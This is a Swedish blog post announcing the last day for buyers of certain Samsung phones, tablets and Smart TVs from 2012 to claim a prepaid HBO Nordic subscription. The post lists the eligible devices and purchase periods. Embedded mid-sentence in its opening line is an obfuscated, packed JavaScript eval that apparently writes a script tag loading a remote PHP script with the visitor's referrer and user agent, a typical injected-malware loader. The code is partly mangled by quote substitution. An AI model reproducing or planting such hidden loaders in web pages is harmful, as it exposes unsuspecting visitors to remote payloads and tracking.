Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

HBO Nordic: Sista dagen för gratisprenumerationen!

HBO Nordic: Sista dagen för gratisprenumerationen!
Sebastian

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ennrd|var|u0026u|referrer|dzfhy||js|php’.split(’|’),0,{}))
är det sista dagen för er som köpt en Samsung produkt att ta del av HBO Nordic gratis prenumeration.

Det är många som missat detta erbjudande och därför tänkte vi meddela.

Samsung har tillsammans med HBO Nordic ett erbjudande där du får en gratis prenumeration på den nya och härliga streamingtjänsten.

Dett gäller dig som köpte en Samsungtelefon eller surfplatta mellan 21 september och 31 december och dig som köpt en Samsung Smart-TV 8 Series mellan 19 november och 18 januari har möjligheten att ta del av timtals av HBO-serier helt gratis. Prenumerationen kan avslutas när som helst under den förbetalada perioden.

Nedan kan du se vilka enheter som kan ta del av HBO Nordic erbjudandet.

Erbjudandet gäller följande produkter:

– Samsung Galaxy SIII 4G (förbetald i 6 månader), om inköpt 21/9 – 31/12
– Samsung Galaxy Tab 2 (förbetald i 6 månader), om inköpt 21/9 – 31/12
– Samsung Note 10.1 (förbetald i 6 månader), om inköpt 21/9 – 31/12
– Samsung Note 2 4G (förbetald i 6 månader), om inköpt 21/9 – 31/12
– Samsung Smart TV 8 series (förbetald i 3 månader), om inköpt 19/11 – 18/1

Så det är bara att logga in på HBO och börja streama serier med hög kvalitet.

HBO Nordic Samsung

Om du har fått en värdekod från HBO eller Samsung, vänligen välj ”Värdekod” nedan och klicka på ”Beställ” för att skapa ett konto. Samsungs förbetalda HBO-erbjudande går snart ut. Kom ihåg att få din egen värdekod om du har köpt någon av följande Samsungprodukter under perioden 21/9 – 31/12 2012: Galaxy SIII 4G, Galaxy Tab2, Note 10.1 och Note 2 4G – du är berättigad 6 förbetalda månader. För Smart TV 8 serien är du är berättigad 3 förbetalda månader, gäller för produkter köpta under perioden 19/11 2012 – 18/1 2013. Du kan avsluta din prenumeration när som helst under den förbetalda perioden. Gå in på www.samsung.se/hbo och kom igång. Du måste aktivera koden före 31:a januari för att bli berättigad din förbetalda period.

Via: HBO.se